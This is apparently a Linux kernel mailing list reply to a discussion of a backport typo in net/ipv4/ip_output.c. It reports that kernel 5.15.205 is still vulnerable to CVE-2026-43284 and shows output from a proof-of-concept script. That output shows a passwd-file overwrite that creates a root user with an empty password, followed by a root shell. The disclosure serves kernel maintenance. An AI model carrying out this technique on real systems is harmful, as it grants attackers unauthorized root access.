Re: Linux 5.15.205
From: Massimiliano Pellizzer
Date: Fri May 08 2026 - 09:17:09 EST
On Fri, May 8, 2026 at 2:44 PM gregkh@xxxxxxxxxxxxxxxxxxx
<gregkh@xxxxxxxxxxxxxxxxxxx> wrote:
>
> On Fri, May 08, 2026 at 12:05:02PM +0000, Dominik Grzegorzek wrote:
> > Hi,
> >
> > I may be mistaken, but I think there might be a small typo in this hunk in net/ipv4/ip_output.c:
> >
> > skb_shinfo(skb)->tx_flags |= SKBFL_SHARED_FRAG;
> >
> > Would this need to be:
> >
> > skb_shinfo(skb)->flags |= SKBFL_SHARED_FRAG;
> >
> > My understanding is that SKBFL_SHARED_FRAG is a bit in skb_shared_info->flags, and skb_has_shared_frag() checks skb_shinfo(skb)->flags.
>
> Adding Ben who did the 5.10 backport so he can comment on this.
>
> thanks,
>
> greg k-h
>
Hi,
The newly released kernel 5.15.205 is still vulnerable to CVE-2026-43284.
```
$ ./run.sh
=== Stage 1 — overwrite 'systemd-timesync' line (89 bytes) with
'sick::0:0:<pad>:/:/bin/bash'
=== Stage 2 — verify
sick::0:0:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:/:/bin/bash
=== Stage 3 — su - sick (empty password via PAM nullok)
[i] state saved to /var/tmp/.cf2.state — run './run.sh --clean' to revert
# uname -r
5.15.205
```